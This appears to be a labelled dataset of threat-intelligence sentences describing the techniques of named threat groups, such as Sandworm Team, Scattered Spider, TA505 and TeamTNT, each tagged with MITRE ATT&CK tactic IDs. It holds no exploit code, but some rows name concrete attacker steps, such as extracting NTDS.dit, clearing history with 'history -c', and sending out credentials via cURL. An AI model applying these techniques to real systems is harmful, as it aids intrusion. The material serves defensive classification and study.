Sandworm Team has collected the username from a compromised host.,['TA0007:Discovery']
"Sandworm Team has acquired open-source tools for their operations, including Invoke-PSImage, which was used to establish an encrypted channel from a compromised host to Sandworm Team's C2 server in preparation for the 2018 Winter Olympics attack, as well as Impacket and RemoteExec, which were used in their 2022 Prestige operations. Additionally, Sandworm Team has used Empire, Cobalt Strike and PoshC2.",['TA0042:Resource Development']
"Sandworm Team has used dedicated network connections from one victim organization to gain unauthorized access to a separate organization. Additionally, Sandworm Team has accessed Internet service providers and telecommunication entities that provide mobile connectivity.",['TA0001:Initial Access']
Sandworm Team staged compromised versions of legitimate software installers in forums to enable initial access to executing user.,['TA0042:Resource Development']
Sandworm Team have used previously acquired legitimate credentials prior to attacks.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Sandworm Team has created VBScripts to run an SSH server.,['TA0002:Execution']
"In 2017, Sandworm Team conducted technical research related to vulnerabilities associated with websites used by the Korean Sport and Olympic Committee, a Korean power company, and a Korean airport.",['TA0042:Resource Development']
Sandworm Team has scanned network infrastructure for vulnerabilities as part of its operational planning.,['TA0043:Reconnaissance']
Sandworm Team's BCS-server tool connects to the designated C2 server via HTTP.,['TA0011:Command and Control']
Sandworm Team has used webshells including P.A.S. Webshell to maintain access to victim networks.,['TA0003:Persistence']
Sandworm Team has used Impacket’s WMIexec module for remote code execution and VBScript to run WMI queries.,['TA0002:Execution']
Scarlet Mimic has used the left-to-right override character in self-extracting RAR archive spearphishing attachment file names.,['TA0005:Defense Evasion']
"During C0027, Scattered Spider used IAM manipulation to gain persistence and to assume or elevate privileges. Scattered Spider has also assigned user access admin roles in order to gain Tenant Root Group management permissions in Azure.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Scattered Spider retrieves browser histories via infostealer malware such as Raccoon Stealer.,['TA0007:Discovery']
"Scattered Spider enumerates cloud environments to identify server and backup management infrastructure, resource access, databases and storage containers.",['TA0007:Discovery']
Scattered Spider abused AWS Systems Manager Inventory to identify targets on the compromised network prior to lateral movement.,['TA0007:Discovery']
"During C0027, Scattered Spider used compromised Azure credentials for credential theft activity and lateral movement to on-premises systems. Scattered Spider has also leveraged pre-existing AWS EC2 instances for lateral movement and data collection purposes.",['TA0008:Lateral Movement']
"Scattered Spider enumerates data stored within victim code repositories, such as internal GitHub repositories.",['TA0009:Collection']
Scattered Spider has used self-signed and stolen certificates originally issued to NVIDIA and Global Software LLC.,['TA0005:Defense Evasion']
Scattered Spider has added additional trusted locations to Azure AD conditional access policies.,"['TA0006:Credential Access', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
Scattered Spider creates new user identities within the compromised organization.,['TA0003:Persistence']
"During C0027, Scattered Spider used access to the victim's Azure tenant to create Azure VMs. Scattered Spider has also created Amazon EC2 instances within the victim's environment.",['TA0005:Defense Evasion']
Scattered Spider Spider searches for credential storage documentation on a compromised host.,['TA0006:Credential Access']
Scattered Spider has used BlackCat ransomware to encrypt files on VMWare ESXi servers.,['TA0040:Impact']
Scattered Spider stages data in a centralized database prior to exfiltration.,['TA0009:Collection']
Scattered Spider enumerates data stored in cloud resources for collection and exfiltration purposes.,['TA0009:Collection']
Scattered Spider has created volume shadow copies of virtual domain controller disks to extract the `NTDS.dit` file.,['TA0005:Defense Evasion']
Scattered Spider leverages legitimate domain accounts to gain access to the target environment.,['TA0007:Discovery']
Scattered Spider threat actors search the victim’s Microsoft Exchange for emails about the intrusion and incident response.,['TA0009:Collection']
Scattered Spider creates inbound rules on the compromised email accounts of security personnel to automatically delete emails from vendor security products.,['TA0005:Defense Evasion']
Scattered Spider has exfiltrated victim data to the MEGA file sharing site.,['TA0010:Exfiltration']
Scattered Spider has deployed a malicious kernel driver through exploitation of CVE-2015-2291 in the Intel Ethernet diagnostics driver for Windows .,['TA0004:Privilege Escalation']
Scattered Spider has leveraged legitimate remote management tools to maintain persistent access.,"['TA0001:Initial Access', 'TA0003:Persistence']"
"Scattered Spider Spider enumerates a target organization for files and directories of interest, including source code.",['TA0007:Discovery']
Scattered Spider has deployed ransomware on compromised hosts for financial gain.,['TA0040:Impact']
"During C0027, Scattered Spider impersonated legitimate IT personnel in phone calls and text messages either to direct victims to a credential harvesting site or getting victims to run commercial remote monitoring and management tools. Scattered Spider utilized social engineering to compel IT help desk personnel to reset passwords and MFA tokens.",['TA0005:Defense Evasion']
Scattered Spider threat actors search the victim’s Slack and Microsoft Teams for conversations about the intrusion and incident response.,['TA0009:Collection']
"After compromising user accounts, Scattered Spider registers their own MFA tokens.","['TA0006:Credential Access', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
Scattered Spider has used multifactor authentication fatigue by sending repeated MFA authentication requests to targets.,['TA0006:Credential Access']
Scattered Spider has extracted the `NTDS.dit` file by creating volume shadow copies of virtual domain controller disks.,['TA0006:Credential Access']
Scattered Spider has used a combination of credential phishing and social engineering to capture one-time-password codes.,['TA0043:Reconnaissance']
Scattered Spider enumerate and exfiltrate code-signing certificates from a compromised host.,['TA0006:Credential Access']
"During C0027, Scattered Spider directed victims to run remote monitoring and management tools. In addition to directing victims to run remote software, Scattered Spider members themselves also deploy RMM software including AnyDesk, LogMeIn, and ConnectWise Control to establish persistence on the compromised network.",['TA0011:Command and Control']
"Scattered Spider can enumerate remote systems, such as VMware vCenter infrastructure.",['TA0007:Discovery']
"During C0027, Scattered Spider used phone calls to instruct victims to navigate to credential-harvesting websites. Scattered Spider has also called employees at target organizations and compelled them to navigate to fake login portals using adversary-in-the-middle toolkits.",['TA0043:Reconnaissance']
Scattered Spider retrieves browser cookies via Raccoon Stealer.,['TA0006:Credential Access']
Scattered Spider adds a federated identity provider to the victim’s SSO tenant and activates automatic account linking.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Scattered Spider has impersonated organization IT and helpdesk staff to instruct victims to execute commercial remote access tools to gain initial access.,['TA0002:Execution']
SideCopy has used a malicious loader DLL file to execute the `credwiz.exe` process and side-load the malicious payload `Duser.dll`.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"SideCopy has compromised domains for some of their infrastructure, including for C2 and staging malware.",['TA0042:Resource Development']
SideCopy has delivered trojanized executables via spearphishing emails that contacts actor-controlled servers to download malicious payloads.,['TA0011:Command and Control']
SideCopy has attempted to lure victims into clicking on malicious embedded archive files sent via spearphishing campaigns.,['TA0002:Execution']
"SideCopy has used a legitimate DLL file name, `Duser.dll` to disguise a malicious remote access tool.",['TA0005:Defense Evasion']
SideCopy has utilized `mshta.exe` to execute a malicious hta file.,['TA0005:Defense Evasion']
SideCopy has executed malware by calling the API function `CreateProcessW`.,['TA0002:Execution']
SideCopy uses a loader DLL file to collect AV product names from an infected host.,['TA0007:Discovery']
SideCopy has collected browser information from a compromised host.,['TA0007:Discovery']
SideCopy has sent spearphishing emails with malicious hta file attachments.,['TA0001:Initial Access']
SideCopy has crafted generic lures for spam campaigns to collect emails and credentials for targeting efforts.,['TA0043:Reconnaissance']
SideCopy has identified the OS version of a compromised host.,['TA0007:Discovery']
SideCopy has identified the country location of a compromised host.,['TA0007:Discovery']
SideCopy has identified the IP address of a compromised host.,['TA0007:Discovery']
SideCopy has used compromised domains to host its malicious payloads.,['TA0042:Resource Development']
SideCopy has sent Microsoft Office Publisher documents to victims that have embedded malicious macros that execute an hta file via calling `mshta.exe`.,['TA0002:Execution']
Sidewinder has used tools to automatically collect system and network configuration information.,['TA0009:Collection']
Sidewinder has configured tools to automatically send collected files to attacker controlled servers.,['TA0010:Exfiltration']
Sidewinder has used base64 encoding for scripts.,['TA0005:Defense Evasion']
Sidewinder has used DLL side-loading to drop and execute malicious payloads including the hijacking of the legitimate Windows application file rekeywiz.exe.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Sidewinder has used the ActiveXObject utility to create OLE objects to obtain execution through Internet Explorer.,['TA0002:Execution']
Sidewinder has used base64 encoding and ECDH-P256 encryption for payloads.,['TA0005:Defense Evasion']
Sidewinder has exploited vulnerabilities to gain execution including CVE-2017-11882 and CVE-2020-0674.,['TA0002:Execution']
Sidewinder has used malware to collect information on files and directories.,['TA0007:Discovery']
Sidewinder has used LNK files to download remote files to the victim's network.,['TA0011:Command and Control']
Sidewinder has used JavaScript to drop and execute malware loaders.,['TA0002:Execution']
Sidewinder has collected stolen files in a temporary folder in preparation for exfiltration.,['TA0009:Collection']
Sidewinder has lured targets to click on malicious files to gain execution in the target environment.,['TA0002:Execution']
Sidewinder has lured targets to click on malicious links to gain execution in the target environment.,['TA0002:Execution']
Sidewinder has named malicious files rekeywiz.exe to match the name of a legitimate Windows executable.,['TA0005:Defense Evasion']
Sidewinder has used mshta.exe to execute malicious payloads.,['TA0005:Defense Evasion']
Sidewinder has used PowerShell to drop and execute malware loaders.,['TA0002:Execution']
Sidewinder has used tools to identify running processes on the victim's machine.,['TA0007:Discovery']
Sidewinder has added paths to executables in the Registry to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Sidewinder has used the Windows service winmgmts:\\.\root\SecurityCenter2 to check installed antivirus products.,['TA0007:Discovery']
Sidewinder has used tools to enumerate software installed on an infected host.,['TA0007:Discovery']
Sidewinder has sent e-mails with malicious attachments often crafted for specific targets.,['TA0001:Initial Access']
Sidewinder has sent e-mails with malicious attachments that lead victims to credential harvesting websites.,['TA0043:Reconnaissance']
Sidewinder has sent e-mails with malicious links often crafted for specific targets.,['TA0001:Initial Access']
Sidewinder has sent e-mails with malicious links to credential harvesting websites.,['TA0043:Reconnaissance']
"Sidewinder has used tools to collect the computer name, OS version, installed hotfixes, as well as information regarding the memory and processor on a compromised host.",['TA0007:Discovery']
"Sidewinder has used malware to collect information on network interfaces, including the MAC address.",['TA0007:Discovery']
Sidewinder has used tools to identify the user of a compromised host.,['TA0007:Discovery']
Sidewinder has used tools to obtain the current system time.,['TA0007:Discovery']
Sidewinder has used VBScript to drop and execute malware loaders.,['TA0002:Execution']
Sidewinder has used HTTP in C2 communications.,['TA0011:Command and Control']
Silence has used a valid certificate to sign their primary loader Silence.Downloader .,['TA0005:Defense Evasion']
Silence has used environment variable string substitution for obfuscation.,['TA0005:Defense Evasion']
Silence has weaponized CHM files in their phishing campaigns.,['TA0005:Defense Evasion']
"Silence has used ProxyBot, which allows the attacker to redirect traffic from the current node to the backconnect server via Sock4\Socks5.",['TA0011:Command and Control']
"Silence has deleted artifacts, including scheduled tasks, communicates files from the C2 and other logs.",['TA0005:Defense Evasion']
Silence has downloaded additional modules and malware to victim’s machines.,['TA0011:Command and Control']
Silence has used JS scripts.,['TA0002:Execution']
Silence has used the Farse6.1 utility ) to extract credentials from lsass.exe.,['TA0006:Credential Access']
Silence attempts to get users to launch malicious attachments delivered via spearphishing emails.,['TA0002:Execution']
"Silence has named its backdoor ""WINWORD.exe"".",['TA0005:Defense Evasion']
"Silence can create, delete, or modify a specified Registry key or value.",['TA0005:Defense Evasion']
"Silence has leveraged the Windows API, including using CreateProcess or ShellExecute, to perform a variety of tasks.",['TA0002:Execution']
Silence has used port 444 when sending data about the system from the client to the server.,['TA0011:Command and Control']
Silence has used PowerShell to download and execute payloads.,['TA0002:Execution']
Silence has injected a DLL library containing a Trojan into the fwmain32.exe process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Silence has used HKCU\Software\Microsoft\Windows\CurrentVersion\Run, HKLM\Software\Microsoft\Windows\CurrentVersion\Run, and the Startup folder to establish persistence.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Silence has used RDP for lateral movement.,['TA0008:Lateral Movement']
"Silence has used Nmap to scan the corporate network, build a network topology, and identify vulnerable hosts.",['TA0007:Discovery']
Silence has used scheduled tasks to stage its operation.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Silence can capture victim screen activity.,['TA0009:Collection']
Silence has used Winexe to install a service on the remote system.,['TA0002:Execution']
"Silence has used RAdmin, a remote software tool used to remotely control workstations and ATMs.","['TA0002:Execution', 'TA0008:Lateral Movement']"
"Silence has sent emails with malicious DOCX, CHM, LNK and ZIP attachments.",['TA0001:Initial Access']
Silence has obtained and modified versions of publicly-available tools like Empire and PsExec.,['TA0042:Resource Development']
Silence has used compromised credentials to log on to other systems and escalate privileges.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Silence has been observed making videos of victims to observe bank employees day to day activities.,['TA0009:Collection']
Silence has used VBS scripts.,['TA0002:Execution']
Silence has used Windows command-line to run commands.,['TA0002:Execution']
Silent Librarian has obtained free Let's Encrypt SSL certificates for use on their phishing pages.,['TA0042:Resource Development']
"Silent Librarian has acquired domains to establish credential harvesting pages, often spoofing the target organization and using free top level domains .TK, .ML, .GA, .CF, and .GQ.",['TA0042:Resource Development']
Silent Librarian has established e-mail accounts to receive e-mails forwarded from compromised accounts.,['TA0042:Resource Development']
Silent Librarian has collected e-mail addresses from targeted organizations from open Internet searches.,['TA0043:Reconnaissance']
Silent Librarian has exfiltrated entire mailboxes from compromised accounts.,['TA0009:Collection']
Silent Librarian has set up auto forwarding rules on compromised e-mail accounts.,['TA0009:Collection']
Silent Librarian has collected lists of names for individuals from targeted organizations.,['TA0043:Reconnaissance']
Silent Librarian has cloned victim organization login pages and staged them for later use in credential harvesting campaigns. Silent Librarian has also made use of a variety of URL shorteners for these staged websites.,['TA0042:Resource Development']
Silent Librarian has used collected lists of names and e-mail accounts to use in password spraying attacks against private sector targets.,['TA0006:Credential Access']
"Silent Librarian has searched victim's websites to identify the interests and academic areas of targeted individuals and to scrape source code, branding, and organizational contact information for phishing pages.",['TA0043:Reconnaissance']
Silent Librarian has used links in e-mails to direct victims to credential harvesting websites designed to appear like the targeted organization's login page.,['TA0043:Reconnaissance']
Silent Librarian has obtained free and publicly available tools including SingleFile and HTTrack to copy login pages of targeted organizations.,['TA0042:Resource Development']
Silent Librarian has used compromised credentials to obtain unauthorized access to online accounts.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
SilverTerrier uses FTP for C2 communications.,['TA0011:Command and Control']
"SilverTerrier targets organizations in high technology, higher education, and manufacturing for business email compromise campaigns with the goal of financial theft.",['TA0040:Impact']
SilverTerrier uses SMTP for C2 communications.,['TA0011:Command and Control']
SilverTerrier uses HTTP for C2 communications.,['TA0011:Command and Control']
Sowbug extracted documents and bundled them into a RAR archive.,['TA0009:Collection']
Sowbug extracted Word documents from a file server on a victim network.,['TA0009:Collection']
Sowbug identified and extracted all Word documents on a server by using a command containing * .doc and *.docx. The actors also searched for documents based on a specific date range and attempted to identify all installed software on a victim.,['TA0007:Discovery']
Sowbug has used keylogging tools.,"['TA0009:Collection', 'TA0006:Credential Access']"
"Sowbug named its tools to masquerade as Windows or Adobe Reader software, such as by using the file name adobecms.exe and the directory CSIDL_APPDATA\microsoft\security.",['TA0005:Defense Evasion']
Sowbug listed remote shared drives that were accessible from a victim.,['TA0007:Discovery']
Sowbug has used credential dumping tools.,['TA0006:Credential Access']
Sowbug obtained OS version and hardware configuration from a victim.,['TA0007:Discovery']
Sowbug has used command line during its intrusions.,['TA0002:Execution']
Star Blizzard has used HubSpot and MailerLite marketing platform services to hide the true sender of phishing emails.,['TA0042:Resource Development']
Star Blizzard has registered domains using randomized words and with names resembling legitimate organizations.,['TA0042:Resource Development']
Star Blizzard has used compromised email accounts to conduct spearphishing against contacts of the original victim.,['TA0042:Resource Development']
Star Blizzard has registered impersonation email accounts to spoof experts in a particular field or individuals and organizations affiliated with the intended target.,['TA0042:Resource Development']
"Star Blizzard has abused email forwarding rules to monitor the activities of a victim, steal information, and maintain persistent access after compromised credentials are reset.",['TA0009:Collection']
Star Blizzard has identified ways to engage targets by researching potential victims' interests and social or professional contacts.,['TA0043:Reconnaissance']
Star Blizzard has used JavaScript to redirect victim traffic from an adversary controlled server to a server hosting the Evilginx phishing framework.,['TA0002:Execution']
Star Blizzard has lured targets into opening malicious .pdf files to deliver malware.,['TA0002:Execution']
Star Blizzard has remotely accessed victims' email accounts to steal messages and attachments.,['TA0009:Collection']
Star Blizzard has used open-source research to identify information about victims to use in targeting.,['TA0043:Reconnaissance']
Star Blizzard has established fraudulent profiles on professional networking sites to conduct reconnaissance.,['TA0042:Resource Development']
Star Blizzard has sent emails with malicious .pdf files to spread malware.,['TA0001:Initial Access']
Star Blizzard has sent emails to establish rapport with targets eventually sending messages with attachments containing links to credential-stealing sites.,['TA0043:Reconnaissance']
Star Blizzard has sent emails to establish rapport with targets eventually sending messages with links to credential-stealing sites.,['TA0043:Reconnaissance']
Star Blizzard has used EvilGinx to steal the session cookies of victims directed to phishing domains.,['TA0006:Credential Access']
Star Blizzard has incorporated the open-source EvilGinx framework into their spearphishing activity.,['TA0042:Resource Development']
Star Blizzard has uploaded malicious payloads to cloud storage sites.,['TA0042:Resource Development']
Star Blizzard has used stolen credentials to sign into victim email accounts.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Star Blizzard has bypassed multi-factor authentication on victim email accounts by using session cookies stolen using EvilGinx.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
Stealth Falcon malware uses WMI to script data collection and command execution on the victim.,['TA0002:Execution']
"Stealth Falcon malware gathers passwords from multiple sources, including Windows Credential Vault and Outlook.",['TA0006:Credential Access']
"Stealth Falcon malware gathers passwords from multiple sources, including Internet Explorer, Firefox, and Chrome.",['TA0006:Credential Access']
Stealth Falcon malware gathers data from the local victim system.,['TA0009:Collection']
"After data is collected by Stealth Falcon malware, it is exfiltrated over the existing C2 channel.",['TA0010:Exfiltration']
"Stealth Falcon malware uses PowerShell commands to perform various functions, including gathering system information via WMI and executing commands from its C2 server.",['TA0002:Execution']
Stealth Falcon malware gathers a list of running processes.,['TA0007:Discovery']
Stealth Falcon malware attempts to determine the installed version of .NET by querying the Registry.,['TA0007:Discovery']
Stealth Falcon malware creates a scheduled task entitled “IE Web Cache” to execute a malicious file hourly.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Stealth Falcon malware encrypts C2 traffic using RC4 with a hard-coded key.,['TA0011:Command and Control']
"Stealth Falcon malware gathers system information via WMI, including the system directory, build number, serial number, version, manufacturer, model, and total physical memory.",['TA0007:Discovery']
Stealth Falcon malware gathers the Address Resolution Protocol table from the victim.,['TA0007:Discovery']
Stealth Falcon malware gathers the registered user and primary owner name via WMI.,['TA0007:Discovery']
Stealth Falcon malware communicates with its C2 server via HTTPS.,['TA0011:Command and Control']
Stealth Falcon malware gathers passwords from the Windows Credential Vault.,['TA0006:Credential Access']
Stealth Falcon malware gathers system information via Windows Management Instrumentation .,['TA0002:Execution']
Strider has used a hidden file system that is stored as a file on disk.,['TA0005:Defense Evasion']
Strider has used local servers with both local network and Internet access to act as internal proxy nodes to exfiltrate data from other parts of the network without direct Internet access.,['TA0011:Command and Control']
"Strider has registered its persistence module on domain controllers as a Windows LSA password filter to acquire credentials any time a domain, local user, or administrator logs in or changes a password.","['TA0006:Credential Access', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
Suckfly has used stolen certificates to sign its malware.,['TA0005:Defense Evasion']
"Suckfly the victim's internal network for hosts with ports 8080, 5900, and 40 open.",['TA0007:Discovery']
Suckfly used a signed credential-dumping tool to obtain victim account credentials.,['TA0006:Credential Access']
Suckfly used legitimate account credentials that they dumped to navigate the internal victim network as though they were the legitimate account owner.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Several tools used by Suckfly have been command-line driven.,['TA0002:Execution']
TA2541 has used TLS encrypted C2 communications including for campaigns using AsyncRAT.,['TA0011:Command and Control']
TA2541 has attempted to disable built-in security protections such as Windows AMSI.,['TA0005:Defense Evasion']
"TA2541 has registered domains often containing the keywords “kimjoy,” “h0pe,” and “grace,” using domain registrars including Netdorm and No-IP DDNS, and hosting providers including xTom GmbH and Danilenko, Artyom.",['TA0042:Resource Development']
TA2541 has used dynamic DNS services for C2 infrastructure.,['TA0011:Command and Control']
TA2541 has used compressed and char-encoded scripts in operations.,['TA0005:Defense Evasion']
TA2541 has used malicious scripts and macros with the ability to download additional payloads.,['TA0011:Command and Control']
TA2541 has run scripts to check internet connectivity from compromised hosts.,['TA0007:Discovery']
TA2541 has used macro-enabled MS Word documents to lure victims into executing malicious payloads.,['TA0002:Execution']
TA2541 has used malicious links to cloud and web services to gain execution on victim machines.,['TA0002:Execution']
TA2541 has used multiple strains of malware available for purchase on criminal forums or in open-source repositories.,['TA0042:Resource Development']
TA2541 has used file names to mimic legitimate Windows files or system functionality.,['TA0005:Defense Evasion']
TA2541 has used `mshta` to execute scripts including VBS.,['TA0005:Defense Evasion']
TA2541 has used PowerShell to download files and to inject into various Windows processes.,['TA0002:Execution']
TA2541 has used process hollowing to execute CyberGate malware.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"TA2541 has injected malicious code into legitimate .NET related processes including regsvcs.exe, msbuild.exe, and installutil.exe.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
TA2541 has placed VBS files in the Startup folder and used Registry run keys to establish persistence for malicious payloads.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
TA2541 has used scheduled tasks to establish persistence for installed tools.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
TA2541 has used tools to search victim systems for security products such as antivirus and firewall software.,['TA0007:Discovery']
TA2541 has used a .NET packer to obfuscate malicious files.,['TA0005:Defense Evasion']
TA2541 has sent phishing emails with malicious attachments for initial access including MS Word documents.,['TA0001:Initial Access']
TA2541 has used spearphishing e-mails with malicious links to deliver malware.,['TA0001:Initial Access']
TA2541 has collected system information prior to downloading malware on the targeted host.,['TA0007:Discovery']
TA2541 has used commodity remote access tools.,['TA0042:Resource Development']
"TA2541 has uploaded malware to various platforms including Google Drive, Pastetext, Sharetext, and GitHub.",['TA0042:Resource Development']
"TA2541 has used VBS files to execute or establish persistence for additional payloads, often using file names consistent with email themes or mimicking system functionality.",['TA0002:Execution']
"TA2541 has hosted malicious files on various platforms including Google Drive, OneDrive, Discord, PasteText, ShareText, and GitHub.",['TA0042:Resource Development']
TA2541 has used WMI to query targeted systems for security products.,['TA0002:Execution']
TA459 has exploited Microsoft Word vulnerability CVE-2017-0199 for execution.,['TA0002:Execution']
TA459 has attempted to get victims to open malicious Microsoft Word attachment sent via spearphishing.,['TA0002:Execution']
TA459 has used PowerShell for execution of a payload.,['TA0002:Execution']
TA459 has targeted victims using spearphishing emails with malicious Microsoft Word attachments.,['TA0001:Initial Access']
TA459 has a VBScript for execution.,['TA0002:Execution']
TA505 has signed payloads with code signing certificates from Thawte and Sectigo.,['TA0005:Defense Evasion']
TA505 has used base64 encoded PowerShell commands.,['TA0005:Defense Evasion']
TA505 has used malware to gather credentials from FTP clients and Outlook.,['TA0006:Credential Access']
TA505 has used malware to gather credentials from Internet Explorer.,['TA0006:Credential Access']
"TA505 has used a wide variety of ransomware, such as Clop, Locky, Jaff, Bart, Philadelphia, and GlobeImposter, to encrypt victim files and demand a ransom payment.",['TA0040:Impact']
TA505 has decrypted packed DLLs with an XOR key.,['TA0005:Defense Evasion']
TA505 has used malware to disable Windows Defender.,['TA0005:Defense Evasion']
TA505 has used stolen domain admin accounts to compromise additional hosts.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
TA505 has registered domains to impersonate services such as Dropbox to distribute malware.,['TA0042:Resource Development']
TA505 has leveraged malicious Word documents that abused DDE.,['TA0002:Execution']
TA505 has been seen injecting a DLL into winword.exe.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
TA505 has used the tool EmailStealer to steal and send lists of e-mail addresses to a remote server.,['TA0007:Discovery']
TA505 has password-protected malicious Word documents.,['TA0005:Defense Evasion']
TA505 has used fast flux to mask botnets by distributing payloads across multiple IPs.,['TA0011:Command and Control']
TA505 has downloaded additional malware to execute on victim systems.,['TA0011:Command and Control']
TA505 has used JavaScript for code execution.,['TA0002:Execution']
"TA505 has used lures to get users to enable content in malicious attachments and execute malicious files contained in archives. For example, TA505 makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files.",['TA0002:Execution']
"TA505 has used lures to get users to click links in emails and attachments. For example, TA505 makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files.",['TA0002:Execution']
TA505 has used malware such as Azorult and Cobalt Strike in their operations.,['TA0042:Resource Development']
TA505 has used .iso files to deploy malicious .lnk files.,['TA0005:Defense Evasion']
TA505 has used malware to disable Windows Defender through modification of the Registry.,['TA0005:Defense Evasion']
TA505 has used msiexec to download and execute malicious Windows Installer files.,['TA0005:Defense Evasion']
TA505 has deployed payloads that use Windows API calls on a compromised host.,['TA0002:Execution']
TA505 has used TinyMet to enumerate members of privileged groups. TA505 has also run net group /domain.,['TA0007:Discovery']
TA505 has used PowerShell to download and execute malware and reconnaissance scripts.,['TA0002:Execution']
TA505 has leveraged rundll32.exe to execute malicious DLLs.,['TA0005:Defense Evasion']
TA505 has used UPX to obscure malicious code.,['TA0005:Defense Evasion']
TA505 has used spearphishing emails with malicious attachments to initially compromise victims.,['TA0001:Initial Access']
TA505 has sent spearphishing emails containing malicious links.,['TA0001:Initial Access']
"TA505 has used a variety of tools in their operations, including AdFind, BloodHound, Mimikatz, and PowerSploit.",['TA0042:Resource Development']
TA505 has staged malware on actor-controlled domains.,['TA0042:Resource Development']
TA505 has used VBS for code execution.,['TA0002:Execution']
TA505 has used HTTP to communicate with C2 nodes.,['TA0011:Command and Control']
TA505 has executed commands using cmd.exe.,['TA0002:Execution']
TA551 has used obfuscated variable names in a JavaScript configuration file.,['TA0005:Defense Evasion']
TA551 has used a DGA to generate URLs from executed macros.,['TA0011:Command and Control']
TA551 has used spoofed company emails that were acquired from email clients on previously infected hosts to target other individuals.,['TA0043:Reconnaissance']
TA551 has retrieved DLLs and installer binaries for malware execution from C2.,['TA0011:Command and Control']
TA551 has prompted users to enable macros within spearphishing attachments to install malware.,['TA0002:Execution']
TA551 has masked malware DLLs as dat and jpg files.,['TA0005:Defense Evasion']
TA551 has used mshta.exe to execute malicious payloads.,['TA0005:Defense Evasion']
TA551 has used regsvr32.exe to load malicious DLLs.,['TA0005:Defense Evasion']
TA551 has used rundll32.exe to load malicious DLLs.,['TA0005:Defense Evasion']
TA551 has sent spearphishing attachments with password protected ZIP files.,['TA0001:Initial Access']
TA551 has used encoded ASCII text for initial C2 communications.,['TA0011:Command and Control']
TA551 has hidden encoded data for malware DLLs in a PNG.,['TA0005:Defense Evasion']
TA551 has used HTTP for C2 communications.,['TA0011:Command and Control']
TA551 has used cmd.exe to execute commands.,['TA0002:Execution']
TA577 has sent thread hijacked messages from compromised emails.,['TA0042:Resource Development']
TA577 has used LNK files to execute embedded DLLs.,['TA0005:Defense Evasion']
TA577 has used JavaScript to execute additional malicious payloads.,['TA0002:Execution']
TA577 has lured users into executing malicious JavaScript files by sending malicious links via email.,['TA0002:Execution']
TA577 has sent emails containing links to malicious JavaScript files.,['TA0001:Initial Access']
TA577 has used BAT files in malware execution chains.,['TA0002:Execution']
TA578 has used JavaScript files in malware execution chains.,['TA0002:Execution']
"TA578 has placed malicious links in contact forms on victim sites, often spoofing a copyright complaint, to redirect users to malicious file downloads.",['TA0002:Execution']
TA578 has filled out contact forms on victims' websites to direct them to adversary-controlled URLs.,['TA0043:Reconnaissance']
TA578 has used Google Firebase to host malicious scripts.,['TA0042:Resource Development']
TeamTNT has used an IRC bot for C2 communications.,['TA0011:Command and Control']
TeamTNT has cleared command history with history -c.,['TA0005:Defense Evasion']
TeamTNT has removed system logs from /var/log/syslog.,['TA0005:Defense Evasion']
TeamTNT has leveraged AWS CLI to enumerate cloud environments with compromised credentials.,['TA0002:Execution']
TeamTNT has queried the AWS instance metadata service for credentials.,['TA0006:Credential Access']
"TeamTNT has deployed XMRig Docker images to mine cryptocurrency. TeamTNT has also infected Docker containers and Kubernetes clusters with XMRig, and used RainbowMiner and lolMiner for mining cryptocurrency.",['TA0040:Impact']
TeamTNT executed Hildegard through the kubelet API run command and by executing commands on running containers.,['TA0002:Execution']
TeamTNT has checked for running containers with docker ps and for specific container names with docker inspect. TeamTNT has also searched for Kubernetes pods running in a local network.,['TA0007:Discovery']
TeamTNT has searched for unsecured AWS credentials and Docker API credentials.,['TA0006:Credential Access']
TeamTNT has used a script that decodes a Base64-encoded version of WeaveWorks Scope.,['TA0005:Defense Evasion']
TeamTNT has deployed different types of containers into victim environments to facilitate execution. TeamTNT has also transferred cryptocurrency mining software to Kubernetes clusters discovered within local IP address ranges.,"['TA0005:Defense Evasion', 'TA0002:Execution']"
TeamTNT has disabled iptables.,['TA0005:Defense Evasion']
"TeamTNT has disabled and uninstalled security tools such as Alibaba, Tencent, and BMC cloud monitoring agents on cloud-based infrastructure.",['TA0005:Defense Evasion']
TeamTNT has obtained domains to host their payloads.,['TA0042:Resource Development']
TeamTNT has encrypted its binaries via AES and encoded files using Base64.,['TA0005:Defense Evasion']
TeamTNT has deployed privileged containers that mount the filesystem of victim machine.,['TA0004:Privilege Escalation']
TeamTNT has sent locally staged files with collected credentials to C2 servers using cURL.,['TA0010:Exfiltration']
TeamTNT has used open-source tools such as Weave Scope to target exposed Docker API ports and gain initial access to victim environments. TeamTNT has also targeted exposed kubelets for Kubernetes environments.,"['TA0001:Initial Access', 'TA0003:Persistence']"
